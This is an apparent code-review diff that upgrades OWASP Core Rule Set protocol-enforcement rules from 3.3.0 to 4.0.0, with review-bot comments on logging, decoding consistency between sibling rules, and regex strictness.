@@ -1028,13 +1106,13 @@ SecRule REQUEST_BASENAME "@rx \.([^.]+)$" \ tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ tag:'PCI/6.5.10',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.extension=.%{tx.1}/',\ chain" SecRule TX:EXTENSION "@within %{tx.restricted_extensions}" \ "t:none,t:urlDecodeUni,t:lowercase,\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" # # Backup or "working" file extension @@ -1042,7 +1120,7 @@ SecRule REQUEST_BASENAME "@rx \.([^.]+)$" \ # SecRule REQUEST_FILENAME "@rx \.[^.~]+~(?:/.*|)$" \ "id:920500,\ - phase:2,\ + phase:1,\ block,\ t:none,t:urlDecodeUni,\ msg:'Attempt to access a backup or working file',\ 
@@ -1055,38 +1133,47 @@ SecRule REQUEST_FILENAME "@rx \.[^.~]+~(?:/.*|)$" \ tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ tag:'PCI/6.5.10',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" # # Restricted HTTP headers # # -=[ Rule Logic ]=- -# The use of certain headers is restricted. They are listed in the variable -# TX.restricted_headers. -# -# The headers are transformed into lowercase before the match. In order to -# make sure that only complete header names are matching, the names in -# TX.restricted_headers are wrapped in slashes. This guarantees that the -# header Range (-> /range/) is not matching the restricted header -# /content-range/ for example. +# The use of certain headers is restricted. They are listed in two variables: +# - TX.restricted_headers_basic: Known security risks, always forbidden (rule +# 920450) +# - TX.restricted_headers_extended: Possible false positives, possible security +# risks, may be forbidden (rule 920451) +# +# The headers are transformed into lowercase before the match. In order to make +# sure that only complete header names match, the names in the +# TX.restricted_headers_* variables are wrapped in slashes. This guarantees that +# the Range header (which becomes /range/) will not match the restricted +# /content-range/ header, for example. # # This is a chained rule, where the first rule fills a set of variables of the -# form TX.header_name_. The second rule is then executed for all -# variables of the form TX.header_name_. +# form TX.header_name__. The second rule is then executed +# for all variables of the form TX.header_name__. # # As a consequence of the construction of the rule, the alert message and the # alert data will not display the original header name Content-Range, but # /content-range/ instead. 
# +# This rule has a stricter sibling, 920451, which matches against the variable +# TX.restricted_headers_extended. It handles deprecated headers that are still +# in use (so false positives are possible, hence unsuitable for blocking in a +# default paranoia level 1 installation) and headers with possible security +# risks. # # -=[ References ]=- # https://access.redhat.com/security/vulnerabilities/httpoxy (Header Proxy) +# https://www.sidechannel.blog/en/http-method-override-what-it-is-and-how-a-pentester-can-use-it # SecRule REQUEST_HEADERS_NAMES "@rx ^.*$" \ "id:920450,\ - phase:2,\ + phase:1,\ block,\ capture,\ t:none,t:lowercase,\ 
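Review bot: The rewritten -=[ Rule Logic ]=- comment describes the variables as `TX.header_name__` without saying that the rule id is now part of the name, which is the whole reason for the `920450_` infix in the setvar of the next hunk (and `920451_` for the PL2 sibling). If a `<rule id>_<header name>` placeholder was lost in rendering, ignore this; otherwise spell it out, e.g. `# form TX.header_name_920450_<header name>. The rule id is part of the variable name so that the sibling rule 920451 only evaluates the variables it set itself.` The sentence about the alert showing `/content-range/` instead of the original header name remains accurate for the new construction. The 920450 rule head visible here continues in the next hunk.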
@@ -1100,17 +1187,158 @@ SecRule REQUEST_HEADERS_NAMES "@rx ^.*$" \ tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ tag:'PCI/12.1',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ - setvar:'tx.header_name_%{tx.0}=/%{tx.0}/',\ + setvar:'tx.header_name_920450_%{tx.0}=/%{tx.0}/',\ chain" - SecRule TX:/^header_name_/ "@within %{tx.restricted_headers}" \ - "setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + SecRule TX:/^header_name_920450_/ "@within %{tx.restricted_headers_basic}" \ + "setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:920013,phase:1,pass,nolog,skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:920014,phase:2,pass,nolog,skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT" # -# -= Paranoia Level 2 =- (apply only when tx.executing_paranoia_level is sufficiently high: 2 or higher) +# Rule against CVE-2022-21907 +# This rule blocks Accept-Encoding headers longer than 50 characters. +# The length of 50 is a heuristic based on the length of values from +# the RFC (https://datatracker.ietf.org/doc/rfc9110/) +# and the respective values assigned by IANA +# (https://www.iana.org/assignments/http-parameters/http-parameters.xml#content-coding). +# +# This rule has a stricter sibling: 920521 +# +SecRule REQUEST_HEADERS:Accept-Encoding "@gt 50" \ + "id:920520,\ + phase:1,\ + block,\ + t:none,t:lowercase,t:length,\ + msg:'Accept-Encoding header exceeded sensible length',\ + logdata:'%{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/255/153',\ + tag:'PCI/12.1',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# +# Restrict response charsets that we allow. 
+# The following rules make sure that the response will be in an ASCII-compatible charset that +# phase 4 rules can properly understand and block. +# + +# +# Some servers rely on the request Accept header to determine what charset to respond with. +# This rule restricts these to familiar charsets. +# +# Regular expression generated from regex-assembly/920600.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 920600 +# +SecRule REQUEST_HEADERS:Accept "!@rx ^(?:(?:\*|[^!-\"\(-\),/:-\?\[-\]\{\}]+)/(?:\*|[^!-\"\(-\),/:-\?\[-\]\{\}]+)|\*)(?:[\s\v]*;[\s\v]*(?:charset[\s\v]*=[\s\v]*\"?(?:iso-8859-15?|utf-8|windows-1252)\b\"?|(?:[^\s\v -\"\(-\),/:-\?\[-\]c\{\}]|c(?:[^!-\"\(-\),/:-\?\[-\]h\{\}]|h(?:[^!-\"\(-\),/:-\?\[-\]a\{\}]|a(?:[^!-\"\(-\),/:-\?\[-\]r\{\}]|r(?:[^!-\"\(-\),/:-\?\[-\]s\{\}]|s(?:[^!-\"\(-\),/:-\?\[-\]e\{\}]|e[^!-\"\(-\),/:-\?\[-\]t\{\}]))))))[^!-\"\(-\),/:-\?\[-\]\{\}]*[\s\v]*=[\s\v]*[^!\(-\),/:-\?\[-\]\{\}]+);?)*(?:[\s\v]*,[\s\v]*(?:(?:\*|[^!-\"\(-\),/:-\?\[-\]\{\}]+)/(?:\*|[^!-\"\(-\),/:-\?\[-\]\{\}]+)|\*)(?:[\s\v]*;[\s\v]*(?:charset[\s\v]*=[\s\v]*\"?(?:iso-8859-15?|utf-8|windows-1252)\b\"?|(?:[^\s\v -\"\(-\),/:-\?\[-\]c\{\}]|c(?:[^!-\"\(-\),/:-\?\[-\]h\{\}]|h(?:[^!-\"\(-\),/:-\?\[-\]a\{\}]|a(?:[^!-\"\(-\),/:-\?\[-\]r\{\}]|r(?:[^!-\"\(-\),/:-\?\[-\]s\{\}]|s(?:[^!-\"\(-\),/:-\?\[-\]e\{\}]|e[^!-\"\(-\),/:-\?\[-\]t\{\}]))))))[^!-\"\(-\),/:-\?\[-\]\{\}]*[\s\v]*=[\s\v]*[^!\(-\),/:-\?\[-\]\{\}]+);?)*)*$" \ + "id:920600,\ + phase:1,\ + block,\ + t:none,t:lowercase,\ + msg:'Illegal Accept header: charset parameter',\ + logdata:'%{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# +# Unicode 
character bypass check for non JSON requests +# See reported bypass in issue: +# https://github.com/coreruleset/coreruleset/issues/2512 +# +SecRule REQBODY_PROCESSOR "!@streq JSON" \ + "id:920540,\ + phase:2,\ + block,\ + t:none,\ + msg:'Possible Unicode character bypass detected',\ + logdata:'%{MATCHED_VAR_NAME}=%{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/255/153/267/72',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + chain" + SecRule REQUEST_URI|REQUEST_HEADERS|ARGS|ARGS_NAMES "@rx (?i)\x5cu[0-9a-f]{4}" \ + "setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# +# Disallow any raw URL fragments. The '#' character should be omitted or URL-encoded. +# CRS rules generally do not check REQUEST_URI_RAW, but some servers accept the fragment as part of the URL path/query. +# This creates false negative evasions. +# +SecRule REQUEST_URI_RAW "@contains #" \ + "id:920610,\ + phase:1,\ + block,\ + t:none,\ + msg:'Raw (unencoded) fragment in request URI',\ + logdata:'%{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# +# The following rule (920620) checks for the presence of 2 or more request Content-Type headers. +# Content-Type confusion poses a significant security risk to a web application. It occurs when +# the server and client have different interpretations of the Content-Type header, leading to +# miscommunication, potential exploitation and WAF bypass. +# +# Using Apache, when multiple Content-Type request headers are received, the server combines them +# into a single header with the values separated by commas. 
For example, if a client sends multiple +# Content-Type headers with values "application/json" and "text/plain", Apache will combine them +# into a single header like this: "Content-Type: application/json, text/plain". +# +# On the other hand, Nginx handles multiple Content-Type headers differently. It preserves each +# header as a separate entity without combining them. So, if a client sends multiple Content-Type +# headers, Nginx will keep them separate, maintaining the original values. +# +SecRule &REQUEST_HEADERS:Content-Type "@gt 1" \ + "id:920620,\ + phase:1,\ + block,\ + t:none,\ + msg:'Multiple Content-Type Request Headers',\ + logdata:'%{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:920013,phase:1,pass,nolog,skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:920014,phase:2,pass,nolog,skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT" +# +# -= Paranoia Level 2 =- (apply only when tx.detection_paranoia_level is sufficiently high: 2 or higher) # # @@ -1135,7 +1363,7 @@ SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:920014,phase:2,pass,nolog,skipAf SecRule REQUEST_HEADERS:Range|REQUEST_HEADERS:Request-Range "@rx ^bytes=(?:(?:\d+)?-(?:\d+)?\s*,?\s*){6}" \ "id:920200,\ - phase:2,\ + phase:1,\ block,\ t:none,\ msg:'Range: Too many fields (6 or more)',\ 
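Review bot: In the new rule 920620 the target is the collection count `&REQUEST_HEADERS:Content-Type`, so `logdata:'%{MATCHED_VAR}'` will record the count (e.g. `2`) rather than the conflicting header values, which is what an analyst triaging a content-type confusion alert needs. If the engines in use expand it, `logdata:'%{REQUEST_HEADERS.Content-Type}'` (or at least a comment stating that the number logged is the header count) would be more useful. For 920540, the chain starter `REQBODY_PROCESSOR "!@streq JSON"` only reaches the chained `\x5cu[0-9a-f]{4}` check on body-less requests if the variable yields an (empty) value rather than no value at all; a regression test with a GET request carrying a `\u` escape in the query string would pin that. In 920520, `t:lowercase` before `t:length` has no effect on the length comparison and could be dropped for clarity.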
@@ -1147,11 +1375,11 @@ SecRule REQUEST_HEADERS:Range|REQUEST_HEADERS:Request-Range "@rx ^bytes=(?:(?:\d tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ tag:'paranoia-level/2',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'WARNING',\ chain" SecRule REQUEST_BASENAME "!@endsWith .pdf" \ - "setvar:'tx.anomaly_score_pl2=+%{tx.warning_anomaly_score}'" + "setvar:'tx.inbound_anomaly_score_pl2=+%{tx.warning_anomaly_score}'" # # This is a sibling of rule 920200 @@ -1159,9 +1387,9 @@ SecRule REQUEST_HEADERS:Range|REQUEST_HEADERS:Request-Range "@rx ^bytes=(?:(?:\d SecRule REQUEST_BASENAME "@endsWith .pdf" \ "id:920201,\ - phase:2,\ + phase:1,\ block,\ - t:none,\ + t:none,t:urlDecodeUni,\ msg:'Range: Too many fields for pdf request (63 or more)',\ logdata:'%{MATCHED_VAR}',\ tag:'application-multi',\ @@ -1171,11 +1399,11 @@ SecRule REQUEST_BASENAME "@endsWith .pdf" \ tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ tag:'paranoia-level/2',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'WARNING',\ chain" SecRule REQUEST_HEADERS:Range|REQUEST_HEADERS:Request-Range "@rx ^bytes=(?:(?:\d+)?-(?:\d+)?\s*,?\s*){63}" \ - "setvar:'tx.anomaly_score_pl2=+%{tx.warning_anomaly_score}'" + "setvar:'tx.inbound_anomaly_score_pl2=+%{tx.warning_anomaly_score}'" SecRule ARGS "@rx %[0-9a-fA-F]{2}" \ 
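Review bot: 920201 now decodes `REQUEST_BASENAME` (`t:none,t:urlDecodeUni`) before `@endsWith .pdf`, but its counterpart in 920200, the chained `REQUEST_BASENAME "!@endsWith .pdf"` in the first hunk on this line, still compares the raw value, so the two siblings can classify the same request differently: a basename such as `report%2Epdf` is non-PDF for 920200 (6-field threshold) and PDF for 920201 (63-field threshold). Apply the same transformation to the chained rule, `"t:none,t:urlDecodeUni,\` before its `setvar`, so the PDF exemption and the stricter PDF rule agree. 920202 at PL4 (hunk `@@ -1457` further down) gets the same `t:urlDecodeUni` and has no raw-comparing sibling, so it needs no change. The heads of 920200 and 920201 lie in neighbouring hunks.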
@@ -1192,46 +1420,11 @@ SecRule ARGS "@rx %[0-9a-fA-F]{2}" \ tag:'OWASP_CRS',\ tag:'capec/1000/255/153/267/120',\ tag:'paranoia-level/2',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'WARNING',\ - setvar:'tx.anomaly_score_pl2=+%{tx.warning_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.warning_anomaly_score}'" -# -# Missing Accept Header -# -# -=[ Rule Logic ]=- -# This rule generates a notice if the Accept header is missing. -# -# Notice: The rule tries to avoid known false positives by ignoring -# OPTIONS requests coming from known offending User-Agents via two -# chained rules. -# As ModSecurity only reports the match of the last matching rule, -# the alert is misleading. -# -SecRule &REQUEST_HEADERS:Accept "@eq 0" \ - "id:920300,\ - phase:2,\ - pass,\ - t:none,\ - msg:'Request Missing an Accept Header',\ - tag:'application-multi',\ - tag:'language-multi',\ - tag:'platform-multi',\ - tag:'attack-protocol',\ - tag:'OWASP_CRS',\ - tag:'capec/1000/210/272',\ - tag:'PCI/6.5.10',\ - tag:'paranoia-level/2',\ - ver:'OWASP_CRS/3.3.0',\ - severity:'NOTICE',\ - chain" - SecRule REQUEST_METHOD "!@rx ^OPTIONS$" \ - "chain" - SecRule REQUEST_HEADERS:User-Agent "!@pm AppleWebKit Android" \ - "t:none,\ - setvar:'tx.anomaly_score_pl2=+%{tx.notice_anomaly_score}'" - # # PL2: This is a stricter sibling of 920270. # @@ -1249,9 +1442,9 @@ SecRule REQUEST_URI|REQUEST_HEADERS|ARGS|ARGS_NAMES "@validateByteRange 9,10,13, tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ tag:'paranoia-level/2',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ - setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -1264,7 +1457,7 @@ SecRule REQUEST_URI|REQUEST_HEADERS|ARGS|ARGS_NAMES "@validateByteRange 9,10,13, SecRule &REQUEST_HEADERS:User-Agent "@eq 0" \ "id:920320,\ - phase:2,\ + phase:1,\ pass,\ t:none,\ msg:'Missing User Agent Header',\ 
@@ -1276,9 +1469,9 @@ SecRule &REQUEST_HEADERS:User-Agent "@eq 0" \ tag:'capec/1000/210/272',\ tag:'PCI/6.5.10',\ tag:'paranoia-level/2',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'NOTICE',\ - setvar:'tx.anomaly_score_pl2=+%{tx.notice_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.notice_anomaly_score}'" # @@ -1298,9 +1491,9 @@ SecRule FILES_NAMES|FILES "@rx ['\";=]" \ tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ tag:'paranoia-level/2',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ - setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" # @@ -1312,7 +1505,7 @@ SecRule FILES_NAMES|FILES "@rx ['\";=]" \ SecRule REQUEST_HEADERS:Content-Length "!@rx ^0$" \ "id:920341,\ - phase:2,\ + phase:1,\ block,\ t:none,\ msg:'Request Containing Content Requires Content-Type header',\ 
@@ -1323,18 +1516,72 @@ SecRule REQUEST_HEADERS:Content-Length "!@rx ^0$" \ tag:'paranoia-level/2',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ chain" SecRule &REQUEST_HEADERS:Content-Type "@eq 0" \ "t:none,\ - setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + + +# +# PL2: This is a stricter sibling of 920450. +# +SecRule REQUEST_HEADERS_NAMES "@rx ^.*$" \ + "id:920451,\ + phase:1,\ + block,\ + capture,\ + t:none,t:lowercase,\ + msg:'HTTP header is restricted by policy (%{MATCHED_VAR})',\ + logdata:'Restricted header detected: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'paranoia-level/2',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/210/272',\ + tag:'PCI/12.1',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.header_name_920451_%{tx.0}=/%{tx.0}/',\ + chain" + SecRule TX:/^header_name_920451_/ "@within %{tx.restricted_headers_extended}" \ + "setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:920015,phase:1,pass,nolog,skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:920016,phase:2,pass,nolog,skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT" # -# -= Paranoia Level 3 =- (apply only when tx.executing_paranoia_level is sufficiently high: 3 or higher) +# Check URL encodings +# +# See comment on rule 920220. 
+# +SecRule REQUEST_HEADERS:Content-Type "@rx ^(?i)application/x-www-form-urlencoded" \ + "id:920240,\ + phase:2,\ + block,\ + t:none,\ + msg:'URL Encoding Abuse Attack Attempt',\ + logdata:'%{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'paranoia-level/2',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/255/153/267/72',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'WARNING',\ + chain" + SecRule REQUEST_BODY "@rx \x25" \ + "chain" + SecRule REQUEST_BODY "@validateUrlEncoding" \ + "setvar:'tx.inbound_anomaly_score_pl2=+%{tx.warning_anomaly_score}'" + +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:920015,phase:1,pass,nolog,skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:920016,phase:2,pass,nolog,skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT" +# +# -= Paranoia Level 3 =- (apply only when tx.detection_paranoia_level is sufficiently high: 3 or higher) # # 
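Review bot: The new 920240 chain runs `REQUEST_BODY "@rx \x25"` before `REQUEST_BODY "@validateUrlEncoding"` without explaining why; the only reason visible is to skip the validator for bodies that contain no `%` at all, which is worth a comment so nobody simplifies it away: `# The @rx \x25 stage is a cheap pre-check: @validateUrlEncoding only runs on bodies that contain a percent sign.` The referenced comment on rule 920220 is outside this hunk, so the PL2 placement cannot be verified here, but the `paranoia-level/2` tag and the `pl2` score variable are consistent with each other. In 920451, `msg:'...(%{MATCHED_VAR})'` is expanded after the chained rule matched, so the alert will show the slash-wrapped lowercase name (e.g. `/content-range/`) as already documented for 920450; saying so in the short `PL2: This is a stricter sibling of 920450.` comment would save readers a trip.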
@@ -1357,9 +1604,48 @@ SecRule REQUEST_URI|REQUEST_HEADERS|ARGS|ARGS_NAMES|REQUEST_BODY "@validateByteR tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ tag:'paranoia-level/3',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ - setvar:'tx.anomaly_score_pl3=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" + +# +# Missing Accept Header +# +# This rule has been moved to PL3 +# +# -=[ Rule Logic ]=- +# This rule generates a notice if the Accept header is missing. +# RFC 7231 does not enforce the use of the Accept header. +# It is just typical browser behavior to send and it can indicate a malicious client. +# +# Notice: The rule tries to avoid known false positives by ignoring +# OPTIONS requests, CONNECT requests, and requests coming from known +# offending User-Agents via two chained rules. +# As ModSecurity only reports the match of the last matching rule, +# the alert is misleading. +# +SecRule &REQUEST_HEADERS:Accept "@eq 0" \ + "id:920300,\ + phase:1,\ + pass,\ + t:none,\ + msg:'Request Missing an Accept Header',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/210/272',\ + tag:'PCI/6.5.10',\ + tag:'paranoia-level/3',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'NOTICE',\ + chain" + SecRule REQUEST_METHOD "!@rx ^(?:OPTIONS|CONNECT)$" \ + "chain" + SecRule REQUEST_HEADERS:User-Agent "!@pm AppleWebKit Android" \ + "t:none,\ + setvar:'tx.inbound_anomaly_score_pl3=+%{tx.notice_anomaly_score}'" # 
@@ -1370,7 +1656,7 @@ SecRule REQUEST_URI|REQUEST_HEADERS|ARGS|ARGS_NAMES|REQUEST_BODY "@validateByteR # Note that this only works in combination with a User-Agent prefix. # # This rule is based on a blog post by Soroush Dalili at -# https://soroush.secproject.com/blog/2019/05/x-up-devcap-post-charset-header-in-aspnet-to-bypass-wafs-again/ +# https://soroush.me/blog/2019/05/x-up-devcap-post-charset-header-in-aspnet-to-bypass-wafs-again/ # SecRule &REQUEST_HEADERS:x-up-devcap-post-charset "@ge 1" \ "id:920490,\ @@ -1385,19 +1671,19 @@ SecRule &REQUEST_HEADERS:x-up-devcap-post-charset "@ge 1" \ tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ tag:'paranoia-level/3',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ chain" SecRule REQUEST_HEADERS:User-Agent "@rx ^(?i)up" \ "t:none,\ - setvar:'tx.anomaly_score_pl3=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" # -# Cache-Control Request Header whitelist +# Cache-Control Request Header allow list # # -=[ Rule Logic ]=- -# This rule aims to strictly whitelist the Cache-Control request header +# This rule aims to strictly allow list the Cache-Control request header # values and to blocks all violations. This should be useful to intercept # "bad bot" and tools that impersonate a real browser but with wrong request # header setup. 
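Review bot: The reworded comment `# This rule aims to strictly allow list the Cache-Control request header` uses "allow list" as a verb, and the pre-existing `and to blocks all violations` on the next line is ungrammatical; since the line is being touched anyway: `# This rule strictly allow-lists the Cache-Control request header values and blocks all violations.` The `header-allowlist` tag rename in the following hunk matches the new wording. The Cache-Control rule head and its regex are in the following hunk.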
@@ -1434,21 +1720,49 @@ SecRule &REQUEST_HEADERS:Cache-Control "@gt 0" \ tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-protocol',\ - tag:'header-whitelist',\ + tag:'header-allowlist',\ tag:'paranoia-level/3',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ chain" - SecRule REQUEST_HEADERS:Cache-Control "!@rx ^(?:(?:max-age=[0-9]+|min-fresh=[0-9]+|no-cache|no-store|no-transform|only-if-cached|max-stale(?:=[0-9]+)?)(\s*\,\s*|$)){1,7}$" \ - "setvar:'tx.anomaly_score_pl3=+%{tx.critical_anomaly_score}'" + SecRule REQUEST_HEADERS:Cache-Control "!@rx ^(?:(?:max-age=[0-9]+|min-fresh=[0-9]+|no-cache|no-store|no-transform|only-if-cached|max-stale(?:=[0-9]+)?)(?:\s*\,\s*|$)){1,7}$" \ + "setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" +# +# This rule checks for valid Accept-Encoding headers +# +# This rule has a less strict sibling: 920520 +# +# Regular expression generated from regex-assembly/920521.ra. 
+# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 920521 +# +SecRule REQUEST_HEADERS:Accept-Encoding "!@rx br|compress|deflate|(?:pack200-)?gzip|identity|\*|^$|aes128gcm|exi|zstd|x-(?:compress|gzip)" \ + "id:920521,\ + phase:1,\ + block,\ + t:none,t:lowercase,\ + msg:'Illegal Accept-Encoding header',\ + logdata:'%{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'paranoia-level/3',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/255/153',\ + tag:'PCI/12.1',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:920017,phase:1,pass,nolog,skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:920018,phase:2,pass,nolog,skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:920017,phase:1,pass,nolog,skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:920018,phase:2,pass,nolog,skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT" # -# -= Paranoia Level 4 =- (apply only when tx.executing_paranoia_level is sufficiently high: 4 or higher) +# -= Paranoia Level 4 =- (apply only when tx.detection_paranoia_level is sufficiently high: 4 or higher) # # @@ -1457,9 +1771,9 @@ SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:920018,phase:2,pass,nolog,skipAf SecRule REQUEST_BASENAME "@endsWith .pdf" \ "id:920202,\ - phase:2,\ + phase:1,\ block,\ - t:none,\ + t:none,t:urlDecodeUni,\ msg:'Range: Too many fields for pdf request (6 or more)',\ logdata:'%{MATCHED_VAR}',\ tag:'application-multi',\ 
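Review bot: The new 920521 regex is unanchored and consists only of alternatives, so `!@rx` merely requires that one of the known codings (or an empty value) appear somewhere in the header; a value such as `gzip, <arbitrary text>` passes, which is weaker than the comment `This rule checks for valid Accept-Encoding headers` suggests. If a real allow list is intended, the assembly file should produce an anchored list grammar, roughly `^\s*(?:(?:br|compress|deflate|...|x-(?:compress|gzip))(?:\s*;\s*q=\d(?:\.\d{1,3})?)?\s*(?:,\s*|$))*$` (constructed sketch), in which case the separate `^$` alternative becomes redundant; if the weaker "contains a known coding" check is deliberate because 920520's length cap bounds the free text, the comment should say so. The Cache-Control rule at the top of this hunk starts outside it.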
